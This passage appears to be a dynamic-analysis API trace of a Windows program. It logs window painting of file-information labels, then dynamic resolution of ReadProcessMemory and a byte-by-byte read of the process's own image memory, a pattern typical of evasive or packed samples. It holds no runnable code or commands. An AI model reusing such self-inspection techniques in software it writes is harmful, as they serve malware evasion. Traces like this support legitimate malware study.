(hWnd=0x7022e, Msg=0x3, wParam=0x0, lParam=0x1350131) returned 0x0 [0078.238] GetCurrentThreadId () returned 0x8ec [0078.238] PostThreadMessageA (idThread=0x8ec, Msg=0x1069, wParam=0x0, lParam=0x0) returned 1 [0078.238] GetCurrentProcessId () returned 0x65c [0078.238] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0078.238] IsWindow (hWnd=0x7022e) returned 1 [0078.238] GetWindowLongA (hWnd=0x7022e, nIndex=-16) returned 382402560 [0078.238] IsIconic (hWnd=0x7022e) returned 0 [0078.238] GetParent (hWnd=0x7022e) returned 0x0 [0078.238] TranslateMessage (lpMsg=0x18fe58) returned 0 [0078.238] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0078.238] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0078.238] IsWindow (hWnd=0x7022e) returned 1 [0078.238] GetWindowLongA (hWnd=0x7022e, nIndex=-16) returned 382402560 [0078.238] IsIconic (hWnd=0x7022e) returned 0 [0078.239] GetParent (hWnd=0x7022e) returned 0x0 [0078.239] TranslateMessage (lpMsg=0x18fe58) returned 0 [0078.239] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0078.239] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0078.239] IsWindow (hWnd=0x7022e) returned 1 [0078.239] GetWindowLongA (hWnd=0x7022e, nIndex=-16) returned 382402560 [0078.239] IsIconic (hWnd=0x7022e) returned 0 [0078.239] GetParent (hWnd=0x7022e) returned 0x0 [0078.239] TranslateMessage (lpMsg=0x18fe58) returned 0 [0078.239] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0078.239] GetActiveWindow () returned 0x7022e [0078.239] GetWindowThreadProcessId (in: hWnd=0x7022e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8ec [0078.239] GetFocus () returned 0x7022e [0078.239] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0078.239] TranslateMessage (lpMsg=0x18fe58) returned 0 [0078.239] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0078.239] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0078.239] IsWindow (hWnd=0x7022e) returned 1 [0078.239] GetWindowLongA (hWnd=0x7022e, nIndex=-16) returned 382402560 [0078.239] IsIconic (hWnd=0x7022e) returned 0 [0078.239] GetParent (hWnd=0x7022e) returned 0x0 [0078.239] TranslateMessage (lpMsg=0x18fe58) returned 0 [0078.239] DispatchMessageA (lpMsg=0x18fe58) [0078.239] IsIconic (hWnd=0x7022e) returned 0 [0078.239] IsIconic (hWnd=0x7022e) returned 0 [0078.239] BeginPaint (in: hWnd=0x7022e, lpPaint=0x18fa00 | out: lpPaint=0x18fa00) returned 0x1c0108a9 [0078.239] GetClientRect (in: hWnd=0x7022e, lpRect=0x18fa40 | out: lpRect=0x18fa40) returned 1 [0078.239] OleTranslateColor () returned 0x0 [0078.239] OleTranslateColor () returned 0x0 [0078.239] CreateSolidBrush (color=0xf0f0f0) returned 0xa1008c8 [0078.239] OleTranslateColor () returned 0x0 [0078.239] OleTranslateColor () returned 0x0 [0078.239] SetTextColor (hdc=0x1c0108a9, color=0x0) returned 0x0 [0078.239] SetBkColor (hdc=0x1c0108a9, color=0xf0f0f0) returned 0xf0f0f0 [0078.239] FillRect (hDC=0x1c0108a9, lprc=0x18fa40, hbr=0xa1008c8) returned 1 [0078.240] SetTextColor (hdc=0x1c0108a9, color=0x0) returned 0x0 [0078.240] SetBkColor (hdc=0x1c0108a9, color=0xf0f0f0) returned 0xf0f0f0 [0078.240] EndPaint (hWnd=0x7022e, lpPaint=0x18fa00) returned 1 [0078.241] IsWindowVisible (hWnd=0x7022e) returned 1 [0078.241] IsIconic (hWnd=0x7022e) returned 0 [0078.241] IsZoomed (hWnd=0x7022e) returned 0 [0078.241] ShowWindow (hWnd=0x7022e, nCmdShow=0) returned 1 [0078.241] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0078.241] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x46, wParam=0x0, lParam=0x18f374) returned 0x0 [0078.241] NtdllDefWindowProc_A (hWnd=0x20196, Msg=0x46, wParam=0x0, lParam=0x18f374) returned 0x0 [0078.242] GetParent (hWnd=0x7022e) returned 0x0 [0078.242] GetWindowRect (in: hWnd=0x7022e, lpRect=0x18ef9c | out: lpRect=0x18ef9c) returned 1 [0078.242] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x47, wParam=0x0, lParam=0x18f374) returned 0x0 [0078.242] GetWindowLongA (hWnd=0x7022e, nIndex=-16) returned 113967104 [0078.242] GetClientRect (in: hWnd=0x7022e, lpRect=0x18f00c | out: lpRect=0x18f00c) returned 1 [0078.242] MapWindowPoints (in: hWndFrom=0x7022e, hWndTo=0x0, lpPoints=0x18f00c, cPoints=0x2 | out: lpPoints=0x18f00c) returned 20250929 [0078.242] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x8, wParam=0x0, lParam=0x0) returned 0x0 [0078.242] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x281, wParam=0x0, lParam=0xc000000f) returned 0x0 [0078.243] NtdllDefWindowProc_A (hWnd=0x7022e, Msg=0x282, wParam=0x1, lParam=0x0) returned 0x0 [0078.243] VarAnd (in: pvarLeft=0x18f6f4, pvarRight=0x18f704, pvarResult=0x18f6e4 | out: pvarResult=0x18f6e4) returned 0x0 [0078.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Full filename: ", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0078.244] InvalidateRect (hWnd=0x7022e, lpRect=0x0, bErase=1) returned 1 [0078.244] CreateCompatibleBitmap (hdc=0x1c0108a9, cx=1440, cy=900) returned 0x1c0508c4 [0078.246] CreateCompatibleDC (hdc=0x1c0108a9) returned 0x220108a7 [0078.246] SelectObject (hdc=0x220108a7, h=0x1c0508c4) returned 0x185000f [0078.246] SetBkMode (hdc=0x220108a7, mode=1) returned 2 [0078.246] OleTranslateColor () returned 0x0 [0078.246] SetBkColor (hdc=0x220108a7, color=0xf0f0f0) returned 0xffffff [0078.246] OleTranslateColor () returned 0x0 [0078.246] UnrealizeObject (h=0xa1008c8) returned 1 [0078.246] FillRect (hDC=0x220108a7, lprc=0x18f5a8, hbr=0xa1008c8) returned 1 [0078.246] OleCreatePictureIndirect () returned 0x0 [0078.249] SelectObject (hdc=0x220108a7, h=0x273008dc) returned 0x1b00017 [0078.249] SelectObject (hdc=0x220108a7, h=0x500a08d5) returned 0x18a002e [0078.249] SelectObject (hdc=0x220108a7, h=0x1900011) returned 0x1900010 [0078.249] SetBrushOrgEx (in: hdc=0x220108a7, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0078.249] UnrealizeObject (h=0x1900015) returned 1 [0078.249] SelectObject (hdc=0x220108a7, h=0x1900015) returned 0x1900011 [0078.249] SetBkMode (hdc=0x220108a7, mode=1) returned 1 [0078.249] OleTranslateColor () returned 0x0 [0078.249] SetBkColor (hdc=0x220108a7, color=0xf0f0f0) returned 0xf0f0f0 [0078.249] OleTranslateColor () returned 0x0 [0078.249] SetTextColor (hdc=0x220108a7, color=0x0) returned 0x0 [0078.249] GetROP2 (hdc=0x1c0108a9) returned 13 [0078.249] SetROP2 (hdc=0x220108a7, rop2=13) returned 13 [0078.249] SelectObject (hdc=0x1c0108a9, h=0x1b00016) returned 0x273008dc [0078.249] SelectObject (hdc=0x1c0108a9, h=0x18a002e) returned 0x500a08d5 [0078.249] SelectObject (hdc=0x1c0108a9, h=0x1900015) returned 0x1900015 [0078.249] SelectPalette (hdc=0x1c0108a9, hPal=0x188000b, bForceBkgd=1) returned 0x188000b [0078.249] OleTranslateColor () returned 0x0 [0078.249] OleTranslateColor () returned 0x0 [0078.249] UnrealizeObject (h=0xa1008c8) returned 1 [0078.249] OleTranslateColor () returned 0x0 [0078.249] OleTranslateColor () returned 0x0 [0078.249] SetTextColor (hdc=0x220108a7, color=0x0) returned 0x0 [0078.249] SetBkColor (hdc=0x220108a7, color=0xf0f0f0) returned 0xf0f0f0 [0078.249] FillRect (hDC=0x220108a7, lprc=0x18f5cc, hbr=0xa1008c8) returned 1 [0078.249] SetTextColor (hdc=0x220108a7, color=0x0) returned 0x0 [0078.249] SetBkColor (hdc=0x220108a7, color=0xf0f0f0) returned 0xf0f0f0 [0078.249] SysStringLen (param_1="Full filename: ") returned 0xf [0078.249] SysStringLen (param_1="Full filename: ") returned 0xf [0078.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Full filename: ", cchWideChar=15, lpMultiByteStr=0x18f5e4, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Full filename: ", lpUsedDefaultChar=0x0) returned 15 [0078.249] GetTextExtentPoint32A (in: hdc=0x220108a7, lpString="Full filename: ", c=15, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0078.251] TabbedTextOutA (hdc=0x220108a7, x=0, y=0, lpString="Full filename: ", chCount=15, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852032 [0078.252] InvalidateRect (hWnd=0x7022e, lpRect=0x0, bErase=1) returned 1 [0078.252] SysStringLen (param_1="\r\n") returned 0x2 [0078.252] SysStringLen (param_1="\r\n") returned 0x2 [0078.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\not·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0078.252] GetTextExtentPoint32A (in: hdc=0x220108a7, lpString="\r\not·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0078.252] TabbedTextOutA (hdc=0x220108a7, x=64, y=0, lpString="\r\not·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0078.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File version: ", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0078.252] InvalidateRect (hWnd=0x7022e, lpRect=0x0, bErase=1) returned 1 [0078.252] SysStringLen (param_1="File version: ") returned 0xe [0078.252] SysStringLen (param_1="File version: ") returned 0xe [0078.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File version: ", cchWideChar=14, lpMultiByteStr=0x18f5e4, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="File version: \x18", lpUsedDefaultChar=0x0) returned 14 [0078.252] GetTextExtentPoint32A (in: hdc=0x220108a7, lpString="File version: \x18", c=14, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0078.252] TabbedTextOutA (hdc=0x220108a7, x=0, y=13, lpString="File version: \x18", chCount=14, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852027 [0078.252] InvalidateRect (hWnd=0x7022e, lpRect=0x0, bErase=1) returned 1 [0078.252] SysStringLen (param_1="\r\n") returned 0x2 [0078.252] SysStringLen (param_1="\r\n") returned 0x2 [0078.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\not·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0078.252] GetTextExtentPoint32A (in: hdc=0x220108a7, lpString="\r\not·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0078.252] TabbedTextOutA (hdc=0x220108a7, x=59, y=13, lpString="\r\not·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0078.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Product version: ", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0078.252] InvalidateRect (hWnd=0x7022e, lpRect=0x0, bErase=1) returned 1 [0078.253] SysStringLen (param_1="Product version: ") returned 0x11 [0078.253] SysStringLen (param_1="Product version: ") returned 0x11 [0078.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Product version: ", cchWideChar=17, lpMultiByteStr=0x18f5e0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Product version: ö\x18", lpUsedDefaultChar=0x0) returned 17 [0078.253] GetTextExtentPoint32A (in: hdc=0x220108a7, lpString="Product version: ö\x18", c=17, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0078.253] TabbedTextOutA (hdc=0x220108a7, x=0, y=26, lpString="Product version: ö\x18", chCount=17, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852048 [0078.253] InvalidateRect (hWnd=0x7022e, lpRect=0x0, bErase=1) returned 1 [0078.253] SysStringLen (param_1="\r\n") returned 0x2 [0078.253] SysStringLen (param_1="\r\n") returned 0x2 [0078.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\not·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0078.253] GetTextExtentPoint32A (in: hdc=0x220108a7, lpString="\r\not·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0078.253] TabbedTextOutA (hdc=0x220108a7, x=80, y=26, lpString="\r\not·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0078.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File flags: ", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.253] InvalidateRect (hWnd=0x7022e, lpRect=0x0, bErase=1) returned 1 [0078.253] SysStringLen (param_1="File flags: ") returned 0xc [0078.253] SysStringLen (param_1="File flags: ") returned 0xc [0078.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File flags: ", cchWideChar=12, lpMultiByteStr=0x18f5e8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="File flags: z\x8d\x99rXö\x18", lpUsedDefaultChar=0x0) returned 12 [0078.253] GetTextExtentPoint32A (in: hdc=0x220108a7, lpString="File flags: z\x8d\x99rXö\x18", c=12, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0078.253] TabbedTextOutA (hdc=0x220108a7, x=0, y=39, lpString="File flags: z\x8d\x99rXö\x18", chCount=12, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852015 [0078.254] InvalidateRect (hWnd=0x7022e, lpRect=0x0, bErase=1) returned 1 [0078.254] SysStringLen (param_1="\r\n") returned 0x2 [0078.254] SysStringLen (param_1="\r\n") returned 0x2 [0078.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\not·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0078.254] GetTextExtentPoint32A (in: hdc=0x220108a7, lpString="\r\not·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0078.254] TabbedTextOutA (hdc=0x220108a7, x=47, y=39, lpString="\r\not·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0078.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File OS: Unknown", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0078.254] InvalidateRect (hWnd=0x7022e, lpRect=0x0, bErase=1) returned 1 [0078.254] SysStringLen (param_1="File OS: Unknown") returned 0x10 [0078.254] SysStringLen (param_1="File OS: Unknown") returned 0x10 [0078.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="File OS: Unknown", cchWideChar=16, lpMultiByteStr=0x18f5e0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="File OS: UnknownXö\x18", lpUsedDefaultChar=0x0) returned 16 [0078.254] GetTextExtentPoint32A (in: hdc=0x220108a7, lpString="File OS: UnknownXö\x18", c=16, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0078.254] TabbedTextOutA (hdc=0x220108a7, x=0, y=52, lpString="File OS: UnknownXö\x18", chCount=16, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 852054 [0078.254] InvalidateRect (hWnd=0x7022e, lpRect=0x0, bErase=1) returned 1 [0078.254] SysStringLen (param_1="\r\n") returned 0x2 [0078.254] SysStringLen (param_1="\r\n") returned 0x2 [0078.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x18f5fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\not·\x8d\x99r", lpUsedDefaultChar=0x0) returned 2 [0078.254] GetTextExtentPoint32A (in: hdc=0x220108a7, lpString="\r\not·\x8d\x99r", c=0, psizl=0x18f620 | out: psizl=0x18f620) returned 1 [0078.254] TabbedTextOutA (hdc=0x220108a7, x=86, y=52, lpString="\r\not·\x8d\x99r", chCount=0, nTabPositions=1, lpnTabStopPositions=0x18f62c, nTabOrigin=0) returned 0 [0079.503] SetErrorMode (uMode=0x8001) returned 0x8001 [0079.503] LoadLibraryA (lpLibFileName="KERNEL32 ") returned 0x759f0000 [0079.503] SetErrorMode (uMode=0x8001) returned 0x8001 [0079.503] GetProcAddress (hModule=0x759f0000, lpProcName="ReadProcessMemory") returned 0x75a1cfcc [0079.503] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400101, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400102, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400103, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400104, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400105, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400106, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400107, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400108, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400109, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40010f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400110, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400111, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400112, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400113, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400114, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400115, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.504] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400116, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.504] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400117, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400118, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400119, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40011f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400120, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.505] GetLastError () returned 0x0 [0079.505] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400121, lpBuffer=0x18f6b4, nSize=0x4, 